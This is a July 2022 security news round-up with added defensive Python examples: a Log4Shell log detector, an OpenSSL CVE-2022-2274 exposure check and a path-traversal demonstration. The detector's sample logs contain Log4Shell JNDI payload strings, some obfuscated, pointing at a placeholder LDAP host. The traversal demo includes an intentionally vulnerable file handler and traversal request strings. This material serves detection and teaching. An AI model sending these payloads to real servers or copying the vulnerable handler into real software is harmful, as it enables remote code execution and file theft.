Weekly Security News Round-Up for July 1st - 8th

Jul 11, 2022


CISA: "Cyber Threat Actors Exploit Log4Shell in VMware Horizon Systems".

CISA and the US Coast Guard Cyber Command (CGCYBER) have published a joint Cybersecurity Advisory warning network defenders that state-sponsored APT actors continue to exploit Log4Shell (CVE-2021-44228) in unpatched VMware Horizon and Unified Access Gateway servers to gain initial access to organizations. Because the exploitation has been ongoing since December 2021, a Horizon or UAG server that was internet-facing and unpatched during that window should be treated as potentially compromised and hunted, not merely patched.


https://cyware.com/news/cisa-advisory-cyber-threat-actors-exploits-log4shell-in-vmware-horizon-systems-2ed6d67e
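The Log4Shell probes that hit Horizon and UAG are rarely the plain `${jndi:ldap://...}` string; attackers nest Log4j lookups (`${lower:j}`, `${::-l}`, `${env:X:-n}`) so that literal signatures miss them. The following is an added example (not code from CISA, VMware or the advisory) that resolves those lookups inside-out before matching, run over a few constructed access-log lines; the function names and the `<<jndi:...>>` marker convention are my own.

```python
import re

# Constructed sample web-server log lines (not from any real incident). Two carry
# Log4Shell probes in the User-Agent field, one of them obfuscated with nested
# lookups; the other two are benign.
SAMPLE_LOGS = [
    '10.0.0.5 - - [02/Jul/2022:10:01:11 +0000] "GET /portal/ HTTP/1.1" 200 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.6 - - [02/Jul/2022:10:01:12 +0000] "GET /portal/ HTTP/1.1" 200 "-" '
    '"${${lower:j}${upper:n}di:${env:NOPE:-l}dap://198.51.100.7/x}"',
    '10.0.0.7 - - [02/Jul/2022:10:01:13 +0000] "GET /portal/ HTTP/1.1" 200 "-" '
    '"Mozilla/5.0"',
    '10.0.0.8 - - [02/Jul/2022:10:01:14 +0000] "GET /portal/?q=${date:yyyy} HTTP/1.1" '
    '200 "-" "-"',
]

# Innermost ${...} lookup: no nested "$", "{" or "}" inside the braces.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")


def _resolve_one(body: str) -> str:
    """Evaluate one Log4j-style lookup the way the obfuscation tricks rely on it."""
    prefix, _, rest = body.partition(":")
    prefix = prefix.lower()
    if prefix == "lower":          # ${lower:J} -> j
        return rest.lower()
    if prefix == "upper":          # ${upper:n} -> N
        return rest.upper()
    if ":-" in body:               # ${env:NOPE:-l} and ${::-l} -> the default value, l
        return body.split(":-", 1)[1]
    # Anything else (jndi, date, sys, ...) is kept as a marker with non-brace
    # delimiters so the detector can see it but LOOKUP does not re-match it.
    return f"<<{prefix}:{rest}>>" if rest else f"<<{prefix}>>"


def normalize_lookups(text: str, max_rounds: int = 32) -> str:
    """Resolve nested lookups inside-out until nothing changes (bounded rounds)."""
    for _ in range(max_rounds):
        resolved = LOOKUP.sub(lambda m: _resolve_one(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def naive_match(line: str) -> bool:
    """The literal signature many early IDS rules shipped with."""
    return "${jndi:" in line.lower()


def is_log4shell_probe(line: str) -> bool:
    """Match on the resolved form, so obfuscated variants are caught too."""
    return "<<jndi:" in normalize_lookups(line)


def scan(lines):
    """Return (index, normalized_line) for every line carrying a JNDI lookup."""
    return [(i, normalize_lookups(l)) for i, l in enumerate(lines) if is_log4shell_probe(l)]


if __name__ == "__main__":
    for i, line in enumerate(SAMPLE_LOGS):
        print(f"line {i}: naive={naive_match(line)} normalized={is_log4shell_probe(line)}")
```

The second sample line is the point: the naive signature misses it, while the normalized form collapses to `<<jndi:ldap://198.51.100.7/x>>` and fires. Run it against the Horizon Blast gateway and UAG access logs, and remember that a hit only proves a probe arrived; confirming exploitation means checking for the outbound LDAP/RMI connection from the server and for child processes of the Horizon/Tomcat service.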


CISA Warns Against Exploitation of PwnKit Linux Vulnerability.

CISA has added "PwnKit" (CVE-2021-4034), a local privilege escalation flaw in polkit's setuid pkexec binary that is being actively exploited, to its Known Exploited Vulnerabilities Catalog. The bug gives any local user root on an unpatched Linux host, so it matters most as the second stage after an initial foothold such as the Log4Shell intrusions above; where a distribution patch cannot be applied yet, removing the setuid bit from pkexec is the documented stop-gap.


https://cyware.com/news/cisa-warns-against-exploitation-of-pwnkit-linux-vulnerability-42838c1b


Microsoft quietly fixes ShadowCoerce Windows NTLM Relay bug.

Microsoft addressed the 'ShadowCoerce' vulnerability (tracked as CVE-2022-30154) in its June 2022 updates without calling it out at the time. ShadowCoerce is an authentication-coercion bug in the MS-FSRVP (File Server Remote VSS Protocol) service: an attacker can force a Windows server that has the File Server VSS Agent Service role installed to authenticate to an attacker-controlled host, and that authentication can then be relayed in an NTLM relay attack.


Threat actors can chain this coercion technique with NTLM relay to take over unpatched Windows domains. Coercion bugs only pay off where the relayed authentication is accepted, so the structural mitigations remain enforcing SMB and LDAP signing, enabling Extended Protection for Authentication on relay targets such as AD CS web enrollment, and restricting NTLM where possible.


https://www.bleepingcomputer.com/news/microsoft/microsoft-quietly-fixes-shadowcoerce-windows-ntlm-relay-bug/?&web_view=true


High severity OpenSSL bug could lead to remote code execution.

A heap memory corruption bug in OpenSSL's RSA implementation (CVE-2022-2274) could enable remote code execution on servers that perform RSA private-key operations. The bug was introduced in OpenSSL 3.0.4 and only affects x86_64 builds running on CPUs that support the AVX512IFMA instructions; the 1.1.1 series and earlier 3.0.x releases are not affected, and the fix is in OpenSSL 3.0.5.

OpenSSL is an open-source cryptographic toolkit that implements SSL and TLS.

It is used to generate RSA private keys and to perform encryption, decryption and signing, so a server that uses a 2048-bit RSA key for TLS on an affected machine triggers the corruption during ordinary private-key operations.


https://portswigger.net/daily-swig/high-severity-openssl-bug-could-lead-to-remote-code-execution?&web_view=true
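Because the bug needs both a specific OpenSSL release and a specific CPU feature, a fleet check has to look at both. The following is an added example (not from the OpenSSL project or the article) that decides exposure from the `openssl version` banner and the flags line of `/proc/cpuinfo`; the sample banner and cpuinfo text are constructed, and the function names are my own.

```python
import re

# Constructed inputs (not captured from any real host): an `openssl version`
# banner and the "flags" line of /proc/cpuinfo, with and without AVX512IFMA.
SAMPLE_BANNER = "OpenSSL 3.0.4 21 Jun 2022"
SAMPLE_CPUINFO_IFMA = (
    "flags\t\t: fpu vme de pse tsc msr pae mce cx8 apic sse sse2 avx avx2 "
    "avx512f avx512dq avx512ifma avx512cd avx512bw avx512vl avx512vbmi\n"
)
SAMPLE_CPUINFO_PLAIN = "flags\t\t: fpu vme de pse tsc msr pae mce cx8 apic sse sse2 avx avx2\n"

# "OpenSSL 3.0.4 21 Jun 2022" or "OpenSSL 1.1.1q  5 Jul 2022" -> the numeric triple.
VERSION_RE = re.compile(r"OpenSSL\s+(\d+)\.(\d+)\.(\d+)")


def parse_openssl_version(banner: str):
    """Return (major, minor, patch) from an `openssl version` banner."""
    m = VERSION_RE.search(banner)
    if not m:
        raise ValueError(f"unrecognised banner: {banner!r}")
    return tuple(int(x) for x in m.groups())


def cpu_has_avx512ifma(cpuinfo: str) -> bool:
    """True if the first 'flags' line of /proc/cpuinfo lists avx512ifma."""
    for line in cpuinfo.splitlines():
        if line.startswith("flags"):
            return "avx512ifma" in line.split(":", 1)[1].split()
    return False


def cve_2022_2274_exposure(banner: str, cpuinfo: str) -> str:
    """Combine the two preconditions: exactly OpenSSL 3.0.4 and an AVX512IFMA CPU."""
    version = parse_openssl_version(banner)
    if version != (3, 0, 4):
        return "not affected: version"
    if not cpu_has_avx512ifma(cpuinfo):
        return "not affected: cpu lacks AVX512IFMA"
    return "AFFECTED: upgrade to OpenSSL 3.0.5"


if __name__ == "__main__":
    # On a real Linux host feed it `openssl version` output and open("/proc/cpuinfo").read().
    print(cve_2022_2274_exposure(SAMPLE_BANNER, SAMPLE_CPUINFO_IFMA))
    print(cve_2022_2274_exposure(SAMPLE_BANNER, SAMPLE_CPUINFO_PLAIN))
```

Two caveats when using this on a fleet: it only inspects the system `openssl` binary, so statically linked or vendored copies (language runtimes, appliances, containers) need their own banner checked, and a host that passes the CPU test can still move to affected hardware if it is a VM, so treat the version condition as the one to fix.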


Raspberry Robin Worm Targets Windows Users.

Raspberry Robin, a Windows worm that spreads via infected USB drives, has been found on the networks of hundreds of organizations. Microsoft says it has identified artifacts of the worm from as early as 2019.


https://cyware.com/news/raspberry-robin-worm-targets-windows-users-c1c6a343


Apple previews a new extreme security feature, Lockdown Mode.

Lockdown Mode is an optional, deliberately restrictive protection for the small number of users who face targeted attacks from mercenary spyware such as that sold by NSO Group and other private companies that develop it for state customers. It trades functionality for attack surface, disabling or limiting features such as message attachments, link previews, complex web technologies and incoming invitations from unknown contacts.


https://www.zdnet.com/article/apple-previews-lockdown-mode-a-new-extreme-security-feature/?web_view=true


Fortinet patches remedy multiple path traversal vulnerabilities

Fortinet has fixed a batch of vulnerabilities across its endpoint and network security products.


On Tuesday (July 5) the California-based company, which accounts for more than a third of all firewall and unified threat management deployments globally, published a large set of firmware and software updates.


Among them is CVE-2022-30302, a group of relative path traversal vulnerabilities in the administrative interface of FortiDeceptor, Fortinet's deception (honeypot) platform. A traversal bug in a management interface is worth prioritising: the interface is exactly what an attacker who has landed inside the network wants to reach, and it should not be exposed beyond a dedicated management segment regardless of patch state.


https://portswigger.net/daily-swig/fortinet-patch-batch-remedies-multiple-path-traversal-vulnerabilities?&web_view=true
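Relative path traversal in a web-based admin interface almost always comes down to joining user-supplied path segments onto a base directory without canonicalising the result. The following is an added example, not FortiDeceptor's code or anything from the advisory: a hypothetical file-serving handler in its vulnerable form beside a hardened one, exercised against a throwaway directory tree that the example builds itself. The `www` and `secret.txt` layout and the function names are assumptions for the demonstration.

```python
import os
import tempfile
from urllib.parse import unquote


def build_demo() -> str:
    """Create a throwaway tree: <root>/www is the web root, <root>/secret.txt sits outside it."""
    root = tempfile.mkdtemp(prefix="traversal-demo-")
    os.makedirs(os.path.join(root, "www", "public"))
    with open(os.path.join(root, "www", "public", "index.html"), "w") as f:
        f.write("<h1>hello</h1>\n")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("top secret\n")
    # A symlink inside the web root that points outside it (constructed for the demo).
    os.symlink(os.path.join(root, "secret.txt"), os.path.join(root, "www", "link.txt"))
    return root


def read_vulnerable(base_dir: str, requested: str) -> bytes:
    """Decode the URL path and join it onto the web root. Three ways this escapes:
    '../' segments (plain or percent-encoded), an absolute path (os.path.join
    silently discards base_dir), and a symlink that points outside the root."""
    path = os.path.join(base_dir, unquote(requested))
    with open(path, "rb") as f:
        return f.read()


def safe_path(base_dir: str, requested: str) -> str:
    """Canonicalise both sides (this resolves '..' and symlinks) and require that the
    target is still inside the web root. The handler expects a path relative to the
    root, so an absolute request is treated as an escape attempt too."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, unquote(requested)))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"path traversal rejected: {requested!r}")
    return target


def read_hardened(base_dir: str, requested: str) -> bytes:
    with open(safe_path(base_dir, requested), "rb") as f:
        return f.read()


if __name__ == "__main__":
    root = build_demo()
    www = os.path.join(root, "www")
    requests = ["public/index.html", "../secret.txt", "..%2Fsecret.txt", "link.txt",
                os.path.join(root, "secret.txt")]
    for req in requests:
        for label, reader in (("vulnerable", read_vulnerable), ("hardened  ", read_hardened)):
            try:
                print(f"{label} {req!r:40} -> {reader(www, req)!r}")
            except (OSError, PermissionError) as e:
                print(f"{label} {req!r:40} -> {e}")
```

The check is done on the canonical path, not on the input string: rejecting `..` or `%2F` in the request misses alternate encodings and symlinks, whereas `realpath` plus `commonpath` rejects anything that ends up outside the root however it got there. Note that `commonpath` raises `ValueError` rather than `PermissionError` when the two paths are on different drives on Windows, which a production handler should also treat as a rejection.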


Google Project Zero Provides Insights About Zero-Days in 2022 So Far

Google Project Zero reported that at least half of the in-the-wild zero-days it tracked in the first half of 2022 (nine of 18) were variants of previously patched vulnerabilities, meaning the earlier fix addressed one path to the bug but not the root cause. The details were presented at the FIRST conference in a talk titled '0-day In-the-Wild Exploitation in 2022…so far'. The practical lesson for vendors is that a fix should be followed by variant analysis of the surrounding code, and for defenders that a patched bug class is not a closed one.


https://cyware.com/news/google-project-zero-provides-insights-about-zero-days-in-2022-so-far-2ad2dffe


Callback Malware Campaigns Impersonate CrowdStrike and Other Cybersecurity Companies

CrowdStrike Intelligence identified a callback phishing campaign on July 8, 2022. The phishing email claims the recipient's company has been breached and urges them to call a phone number, where the operator walks the victim through installing remote-access software. The campaign reuses the social-engineering playbook of WIZARD SPIDER's 2021 BazarCall operation. Because the lure carries no link or attachment, controls that key on URLs and attachments do not see it; user awareness and a policy that no vendor will ever ask for remote access over a cold call are the relevant defences.


CrowdStrike assesses that the operation will likely use commodity RATs for initial access, legitimate penetration-testing tools for lateral movement, and end in ransomware deployment or data extortion.


https://www.crowdstrike.com/blog/callback-malware-campaigns-impersonate-crowdstrike-and-other-cybersecurity-companies/?&web_view=true